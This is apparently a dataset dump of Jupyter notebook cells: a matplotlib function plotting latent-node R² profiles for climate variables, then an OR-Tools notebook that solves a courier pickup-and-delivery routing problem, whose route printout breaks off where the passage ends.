"def quad_plot_PC_R_2_updated(SP_output_corr_node_0_R_2,\n SP_output_corr_node_1_R_2,\n SP_output_corr_node_2_R_2,\n SP_output_corr_node_3_R_2,\n SP_output_corr_node_4_R_2,\n press,labels):\n \n \"\"\"\n author: Gunnar Behrens\n \n plot squared linear correlation in time between latent nodes and VAE_clim_clim_conv predictions\n as vertical profiles in pressure coordinates for 3D variables and retrieve R² space-time values for 2D\n variables\n \n SP_output_corr_node_*_R_2 -- squarred corr coefs of each latent node \n press -- vertical axis in pressure coords\n labels -- predicted variable list\n \n \"\"\"\n \n \n import pandas as pd \n Press=press/100\n \n c_map=[[0,0,0,1],[1,0,1,1],[0,0,1,1],[0,0.4,0.5,1],[0.6,0.4,0,1]]\n plt.figure(1,(24,9))\n plt.subplot(1,4,1)\n plt.plot(SP_output_corr_node_0_R_2[0:30],Press[0:30],color=c_map[0],\n label='Node 1')\n plt.plot(SP_output_corr_node_1_R_2[0:30],Press[0:30],color=c_map[1],\n label='Node 2')\n plt.plot(SP_output_corr_node_2_R_2[0:30],Press[0:30],color=c_map[2],\n label='Node 3')\n plt.plot(SP_output_corr_node_3_R_2[0:30],Press[0:30],color=c_map[3],\n label='Node 4')\n plt.plot(SP_output_corr_node_4_R_2[0:30],Press[0:30],color=c_map[4],\n label='Node 5')\n plt.title('Specific Humidity Tend.', Fontsize=24)\n plt.legend(fontsize=17,loc=2)\n plt.ylabel('Pressure [hPa]', Fontsize=24)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('Median R²', Fontsize=20)\n\n plt.xticks(Fontsize=16)\n plt.yticks(Fontsize=16)\n\n plt.grid(True)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_2=plt.subplot(1,4,2)\n plt.plot(SP_output_corr_node_0_R_2[30:60],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[30:60],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[30:60],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[30:60],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[30:60],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_2.set_yticklabels([])\n plt.xlabel('Median R²', Fontsize=20)\n\n #plt.legend(fontsize=12)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.grid(True)\n \n plt.title('Temperature Tend.', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n\n ax_3=plt.subplot(1,4,3)\n plt.plot(SP_output_corr_node_0_R_2[65:95],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[65:95],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[65:95],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[65:95],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[65:95],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_3.set_yticklabels([])\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('Median R²', Fontsize=20)\n plt.grid(True)\n plt.title('Specific Humidity', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_4=plt.subplot(1,4,4)\n plt.plot(SP_output_corr_node_0_R_2[95:125],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[95:125],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[95:125],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[95:125],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[95:125],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_4.set_yticklabels([])\n plt.legend(fontsize=16)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('Median R²', Fontsize=20)\n\n plt.grid(True)\n plt.title('Temperature', Fontsize=24 )\n inv=plt.gca()\n inv.invert_yaxis()\n\n \n \n scalar=[60,61,62,63,64,125,126,127,128]\n \n dg=pd.DataFrame([[labels[k],SP_output_corr_node_0_R_2[k],\n SP_output_corr_node_1_R_2[k],\n SP_output_corr_node_2_R_2[k],\n SP_output_corr_node_3_R_2[k],\n SP_output_corr_node_4_R_2[k]] for k in scalar],\n columns=['Variable','Node 0', 'Node 1','Node 2', 'Node 3','Node 4'])\n \n \n \n \n \n return dg",
"_____no_output_____"
],
[
"# compute median squared linear correlation coefficients along time axis, plot results \nquad_plot_PC_R_2_updated(np.median(overall_corr_node_0_lat_lon**2,0),\n np.median(overall_corr_node_1_lat_lon**2,0),\n np.median(overall_corr_node_2_lat_lon**2,0),\n np.median(overall_corr_node_3_lat_lon**2,0),\n np.median(overall_corr_node_4_lat_lon**2,0),\n P,all_labels)",
"<ipython-input-11-fc037c58d525>:38: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity Tend.', Fontsize=24)\n<ipython-input-11-fc037c58d525>:40: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.ylabel('Pressure [hPa]', Fontsize=24)\n<ipython-input-11-fc037c58d525>:43: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:45: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:46: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.yticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:58: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:60: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:67: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature Tend.', Fontsize=24)\n<ipython-input-11-fc037c58d525>:77: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-11-fc037c58d525>:81: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:83: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity', Fontsize=24)\n<ipython-input-11-fc037c58d525>:93: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\nNo handles with labels found to put in legend.\n<ipython-input-11-fc037c58d525>:98: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('Median R²', Fontsize=20)\n<ipython-input-11-fc037c58d525>:101: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature', Fontsize=24 )\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e70807bb0034f327c330e69092fe5a9244e05542 | 92,698 | ipynb | Jupyter Notebook | OR tools.ipynb | team-lasalca/diversity-algo | e3e5992b9a259e9aa34c8a34b807da9ea7d072fb | [
"MIT"
] | null | null | null | OR tools.ipynb | team-lasalca/diversity-algo | e3e5992b9a259e9aa34c8a34b807da9ea7d072fb | [
"MIT"
] | null | null | null | OR tools.ipynb | team-lasalca/diversity-algo | e3e5992b9a259e9aa34c8a34b807da9ea7d072fb | [
"MIT"
] | null | null | null | 28.986241 | 262 | 0.388563 | [
[
[
"import pandas as pd\nimport numpy as np\nfrom json import loads, dumps\nfrom IPython.display import display\nfrom ortools.constraint_solver import routing_enums_pb2, pywrapcp\nfrom scipy.spatial import distance_matrix\nimport subprocess",
"_____no_output_____"
],
[
"inf = int(1e10)\nmax_time = (24 - 6) * 60\nstart = 6 * 60",
"_____no_output_____"
],
[
"#DATA_IN_PATH = \"phystech-master/data/contest_input.json\"\n#DATA_OUT_PATH = \"phystech-master/data/model_output.json\"\n\n#DATA_IN_PATH = \"phystech-master/data/simple_input.json\"\n#DATA_OUT_PATH = \"phystech-master/data/model_output.json\"\n\nDATA_IN_PATH = \"phystech-master/kamil/cls_input.json\"\nDATA_OUT_PATH = \"phystech-master/kamil/cls_output.json\"",
"_____no_output_____"
],
[
"with open(DATA_IN_PATH, 'r') as file:\n data_in_json = file.read()",
"_____no_output_____"
],
[
"data_in_python = loads(data_in_json)\ncolumns = list(data_in_python.keys())\ncolumns",
"_____no_output_____"
],
[
"dfs = {}\nfor key, value in data_in_python.items():\n dfs[key] = pd.DataFrame(value)\n\ncouriers = dfs[\"couriers\"]\ndepots = dfs[\"depots\"]\norders = dfs[\"orders\"]",
"_____no_output_____"
],
[
"places = []\nplaces_simple = []\npickups_deliveries = []\ntime_windows = []\n\n'''\nfor _, depot in depots.iterrows():\n place = {\"point_id\": depot[\"point_id\"], \"x\": depot[\"location_x\"], \"y\": depot[\"location_y\"], \"type\": \"depot\"}\n places_simple.append([place[\"x\"], place[\"y\"]])\n time_windows.append([0, max_time])\n places.append(place)\n'''\n\nfor i, order in orders.iterrows(): \n place = {\"point_id\": order[\"pickup_point_id\"], \"x\": order[\"pickup_location_x\"], \"y\": order[\"pickup_location_y\"], \"from\": order[\"pickup_from\"], \"to\": order[\"pickup_to\"], \"type\": \"pickup\"}\n place2 = {\"point_id\": order[\"dropoff_point_id\"], \"x\": order[\"dropoff_location_x\"], \"y\": order[\"dropoff_location_y\"], \"from\": order[\"dropoff_from\"], \"to\": order[\"dropoff_to\"], \"type\": \"dropoff\"}\n if place[\"from\"] >= place[\"to\"] or place2[\"from\"] >= place2[\"to\"]:\n orders.drop(i)\n continue\n \n pickups_deliveries.append([len(places_simple), len(places_simple) + 1])\n \n places_simple.append([place[\"x\"], place[\"y\"]])\n time_windows.append([place[\"from\"] - start, place[\"to\"] - start])\n places.append(place)\n \n places_simple.append([place2[\"x\"], place2[\"y\"]])\n time_windows.append([place2[\"from\"] - start, place2[\"to\"] - start])\n places.append(place2)\n\nroute_start = len(places_simple)\nfor _, courier in couriers.iterrows():\n places_simple.append([courier[\"location_x\"], courier[\"location_y\"]])\n time_windows.append([0, max_time])\n\nplaces = pd.DataFrame(places)\ndistances = distance_matrix(x=places_simple, y=places_simple, p=1) + 10\ndistances = np.append(distances, np.zeros(distances.shape[0]).reshape(-1, 1), axis=1)\ndistances = np.append(distances, np.zeros(distances.shape[1]).reshape(1, -1), axis=0)\ntime_windows.append([0, max_time])",
"_____no_output_____"
],
[
"orders.drop(\"pickup_location_x\", axis=1, inplace=True)\norders.drop(\"pickup_location_y\", axis=1, inplace=True)\norders.drop(\"pickup_from\", axis=1, inplace=True)\norders.drop(\"pickup_to\", axis=1, inplace=True)\n\norders.drop(\"dropoff_location_x\", axis=1, inplace=True)\norders.drop(\"dropoff_location_y\", axis=1, inplace=True)\norders.drop(\"dropoff_from\", axis=1, inplace=True)\norders.drop(\"dropoff_to\", axis=1, inplace=True)",
"_____no_output_____"
],
[
"display(couriers)\ndisplay(places)\ndisplay(orders)\n\ndisplay(distances)\ndisplay(time_windows)\ndisplay(pickups_deliveries)",
"_____no_output_____"
],
[
"print(\"couriers:\", couriers.shape)\nprint(\"places:\", places.shape)\nprint(\"orders:\", orders.shape)",
"couriers: (300, 3)\nplaces: (464, 6)\norders: (232, 12)\n"
],
[
"def print_solution(data, manager, routing, solution):\n \"\"\"Prints solution on console.\"\"\"\n max_route_distance = 0\n json = []\n \n for vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n plan_output = 'Route for vehicle {}:\\n'.format(vehicle_id)\n route_distance = 0\n \n plan_output += 'START ->';\n while not routing.IsEnd(index):\n if manager.IndexToNode(index) < places.index.stop:\n place = places.iloc[manager.IndexToNode(index)]\n plan_output += ' {} -> '.format(place[\"point_id\"])\n \n order_id = orders[((orders[\"pickup_point_id\"] == place[\"point_id\"]) | (orders[\"dropoff_point_id\"] == place[\"point_id\"]))][\"order_id\"]\n if len(order_id) != 0:\n order_id = order_id.head(1)\n else:\n order_id = -1\n \n current_json = {\n \"courier_id\": int(couriers.iloc[vehicle_id][\"courier_id\"]),\n \"action\": place[\"type\"], # check depot\n \"order_id\": int(order_id),\n \"point_id\": int(place[\"point_id\"]),\n }\n json.append(current_json)\n \n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(\n previous_index, index, vehicle_id)\n \n if manager.IndexToNode(index) < places.index.stop:\n plan_output += '{}\\n'.format(manager.IndexToNode(index))\n else:\n plan_output += 'END\\n'\n plan_output += 'Distance of the route: {}m\\n'.format(route_distance)\n print(plan_output)\n max_route_distance = max(route_distance, max_route_distance)\n print('Maximum of the route distances: {}m'.format(max_route_distance))\n return json",
"_____no_output_____"
],
[
"data = {}\ndata[\"time_matrix\"] = distances\ndata[\"time_windows\"] = time_windows\ndata[\"num_vehicles\"] = len(couriers)\ndata[\"starts\"] = list(range(route_start, len(distances) - 1))\ndata[\"ends\"] = [len(distances) - 1] * len(couriers)\ndata[\"pickups_deliveries\"] = pickups_deliveries",
"_____no_output_____"
],
[
"%%time\nmanager = pywrapcp.RoutingIndexManager(len(data[\"time_matrix\"]), data[\"num_vehicles\"], data[\"starts\"], data[\"ends\"])\nrouting = pywrapcp.RoutingModel(manager)\n\ndef time_callback(from_index, to_index):\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data[\"time_matrix\"][from_node][to_node]\n\ntransit_callback_index = routing.RegisterTransitCallback(time_callback)\nrouting.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\ndimension_name = 'Time'\nrouting.AddDimension(\n transit_callback_index,\n max_time, # inf slack\n max_time, # vehicle maximum travel distance\n False, # start cumul to zero\n dimension_name)\n\ntime_dimension = routing.GetDimensionOrDie(dimension_name)\n\nfor location_idx in range(route_start): \n time_window = data[\"time_windows\"][location_idx]\n index = manager.NodeToIndex(location_idx)\n time_dimension.CumulVar(index).SetRange(int(time_window[0]), int(time_window[1]))\n\nfor vehicle_id in range(data['num_vehicles']):\n index = routing.Start(vehicle_id)\n time_dimension.CumulVar(index).SetRange(int(data['time_windows'][-1][0]),\n int(data['time_windows'][-1][1]))\n\nfor i in range(data['num_vehicles']):\n routing.AddVariableMinimizedByFinalizer(\n time_dimension.CumulVar(routing.Start(i)))\n routing.AddVariableMinimizedByFinalizer(\n time_dimension.CumulVar(routing.End(i)))\n\nfor i, place in places.iterrows():\n order_payment = orders[((orders[\"pickup_point_id\"] == place[\"point_id\"]) | (orders[\"dropoff_point_id\"] == place[\"point_id\"]))][\"payment\"]\n if len(order_payment) != 0:\n order_payment = order_payment.head(1)\n else:\n order_payment = 0\n routing.AddDisjunction([manager.NodeToIndex(i)], int(order_payment))\n\nfor request in data[\"pickups_deliveries\"]:\n pickup_index = manager.NodeToIndex(request[0])\n delivery_index = manager.NodeToIndex(request[1])\n routing.AddPickupAndDelivery(pickup_index, delivery_index)\n routing.solver().Add(\n routing.VehicleVar(pickup_index) == routing.VehicleVar(\n delivery_index))\n routing.solver().Add(\n time_dimension.CumulVar(pickup_index) <=\n time_dimension.CumulVar(delivery_index))\n\nsearch_parameters = pywrapcp.DefaultRoutingSearchParameters()\nsearch_parameters.time_limit.seconds = 60 * 60\nsearch_parameters.first_solution_strategy = routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n\nsolution = routing.SolveWithParameters(search_parameters)",
"CPU times: user 1min 33s, sys: 12.2 ms, total: 1min 33s\nWall time: 1min 33s\n"
],
[
"if solution:\n print(routing.status())\n \n json = print_solution(data, manager, routing, solution)\n with open(DATA_OUT_PATH, \"w\") as out:\n out.write(dumps(json))\n print(\"Done.\")",
"1\nRoute for vehicle 0:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 1:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 2:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 3:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 4:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 5:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 6:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 7:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 8:\nSTART -> 47067 -> 43798 -> 44256 -> 44201 -> 63798 -> 64201 -> 64256 -> 67067 -> END\nDistance of the route: 237m\n\nRoute for vehicle 9:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 10:\nSTART -> 40260 -> 45290 -> 60260 -> 65290 -> END\nDistance of the route: 161m\n\nRoute for vehicle 11:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 12:\nSTART -> 43574 -> 42679 -> 46859 -> 62679 -> 63574 -> 66859 -> END\nDistance of the route: 181m\n\nRoute for vehicle 13:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 14:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 15:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 16:\nSTART -> 44517 -> 46319 -> 64517 -> 66319 -> END\nDistance of the route: 158m\n\nRoute for vehicle 17:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 18:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 19:\nSTART -> 41524 -> 61524 -> 42255 -> 42771 -> 43095 -> 44530 -> 62771 -> 63095 -> 62255 -> 64530 -> END\nDistance of the route: 339m\n\nRoute for vehicle 20:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 21:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 22:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 23:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 24:\nSTART -> 46967 -> 42245 -> 40374 -> 45230 -> 42493 -> 43179 -> 63179 -> 62245 -> 65230 -> 60374 -> 62493 -> 66967 -> END\nDistance of the route: 289m\n\nRoute for vehicle 25:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 26:\nSTART -> 43503 -> 63503 -> END\nDistance of the route: 81m\n\nRoute for vehicle 27:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 28:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 29:\nSTART -> 44259 -> 45684 -> 46043 -> 64259 -> 65684 -> 66043 -> END\nDistance of the route: 208m\n\nRoute for vehicle 30:\nSTART -> 40460 -> 40439 -> 45294 -> 42196 -> 46860 -> 62196 -> 65294 -> 60460 -> 60439 -> 66860 -> END\nDistance of the route: 240m\n\nRoute for vehicle 31:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 32:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 33:\nSTART -> 45224 -> 41995 -> 61995 -> 65224 -> END\nDistance of the route: 123m\n\nRoute for vehicle 34:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 35:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 36:\nSTART -> 40625 -> 60625 -> END\nDistance of the route: 134m\n\nRoute for vehicle 37:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 38:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 39:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 40:\nSTART -> 42510 -> 43322 -> 62510 -> 63322 -> END\nDistance of the route: 168m\n\nRoute for vehicle 41:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 42:\nSTART -> 47163 -> 41978 -> 42954 -> 47070 -> 61978 -> 62954 -> 67070 -> 67163 -> END\nDistance of the route: 282m\n\nRoute for vehicle 43:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 44:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 45:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 46:\nSTART -> 45921 -> 44885 -> 42202 -> 42485 -> 62202 -> 62485 -> 64885 -> 65921 -> END\nDistance of the route: 211m\n\nRoute for vehicle 47:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 48:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 49:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 50:\nSTART -> 44064 -> 45573 -> 65573 -> 64064 -> END\nDistance of the route: 169m\n\nRoute for vehicle 51:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 52:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 53:\nSTART -> 40201 -> 46099 -> 42025 -> 60201 -> 62025 -> 66099 -> END\nDistance of the route: 232m\n\nRoute for vehicle 54:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 55:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 56:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 57:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 58:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 59:\nSTART -> 45733 -> 40371 -> 42923 -> 60371 -> 62923 -> 65733 -> END\nDistance of the route: 229m\n\nRoute for vehicle 60:\nSTART -> 42520 -> 42332 -> 62520 -> 62332 -> END\nDistance of the route: 151m\n\nRoute for vehicle 61:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 62:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 63:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 64:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 65:\nSTART -> 40612 -> 40067 -> 40059 -> 60059 -> 60067 -> 60612 -> END\nDistance of the route: 188m\n\nRoute for vehicle 66:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 67:\nSTART -> 46532 -> 46449 -> 42964 -> 62964 -> 66449 -> 66532 -> END\nDistance of the route: 199m\n\nRoute for vehicle 68:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 69:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 70:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 71:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 72:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 73:\nSTART -> 44572 -> 43842 -> 43003 -> 46239 -> 46102 -> 63003 -> 66102 -> 64572 -> 63842 -> 66239 -> END\nDistance of the route: 247m\n\nRoute for vehicle 74:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 75:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 76:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 77:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 78:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 79:\nSTART -> 41206 -> 40511 -> 40084 -> 45972 -> 60084 -> 60511 -> 43170 -> 61206 -> 44123 -> 44586 -> 63170 -> 64123 -> 65972 -> 64586 -> END\nDistance of the route: 403m\n\nRoute for vehicle 80:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 81:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 82:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 83:\nSTART -> 40823 -> 42794 -> 43365 -> 43511 -> 62794 -> 60823 -> 63511 -> 63365 -> END\nDistance of the route: 192m\n\nRoute for vehicle 84:\nSTART -> 44511 -> 46389 -> 41934 -> 46145 -> 40057 -> 60057 -> 61934 -> 66389 -> 66145 -> 64511 -> END\nDistance of the route: 266m\n\nRoute for vehicle 85:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 86:\nSTART -> 41499 -> 44720 -> 43832 -> 45110 -> 63832 -> 64720 -> 65110 -> 61499 -> END\nDistance of the route: 258m\n\nRoute for vehicle 87:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 88:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 89:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 90:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 91:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 92:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 93:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 94:\nSTART -> 44826 -> 43609 -> 63609 -> 64826 -> END\nDistance of the route: 108m\n\nRoute for vehicle 95:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 96:\nSTART -> 43723 -> 45826 -> 43828 -> 45915 -> 65826 -> 63723 -> 65915 -> 63828 -> END\nDistance of the route: 185m\n\nRoute for vehicle 97:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 98:\nSTART -> 45042 -> 43349 -> 43268 -> 63349 -> 63268 -> 65042 -> END\nDistance of the route: 213m\n\nRoute for vehicle 99:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 100:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 101:\nSTART -> 42060 -> 62060 -> END\nDistance of the route: 89m\n\nRoute for vehicle 102:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 103:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 104:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 105:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 106:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 107:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 108:\nSTART -> 41634 -> 61634 -> 44869 -> 42782 -> 62782 -> 64869 -> END\nDistance of the route: 243m\n\nRoute for vehicle 109:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 110:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 111:\nSTART -> 41775 -> 46152 -> 61775 -> 43649 -> 63649 -> 66152 -> END\nDistance of the route: 237m\n\nRoute for vehicle 112:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 113:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 114:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 115:\nSTART -> 45298 -> 45078 -> 44001 -> 64001 -> 65078 -> 65298 -> END\nDistance of the route: 178m\n\nRoute for vehicle 116:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 117:\nSTART -> 43494 -> 63494 -> END\nDistance of the route: 109m\n\nRoute for vehicle 118:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 119:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 120:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 121:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 122:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 123:\nSTART -> 42271 -> 42820 -> 62271 -> 62820 -> END\nDistance of the route: 140m\n\nRoute for vehicle 124:\nSTART -> 41984 -> 44748 -> 42243 -> 62243 -> 61984 -> 64748 -> END\nDistance of the route: 173m\n\nRoute for vehicle 125:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 126:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 127:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 128:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 129:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 130:\nSTART -> 41739 -> 43273 -> 42157 -> 61739 -> 63273 -> 62157 -> END\nDistance of the route: 174m\n\nRoute for vehicle 131:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 132:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 133:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 134:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 135:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 136:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 137:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 138:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 139:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 140:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 141:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 142:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 143:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 144:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 145:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 146:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 147:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 148:\nSTART -> 44032 -> 64032 -> END\nDistance of the route: 82m\n\nRoute for vehicle 149:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 150:\nSTART -> 43312 -> 40038 -> 40021 -> 43320 -> 63320 -> 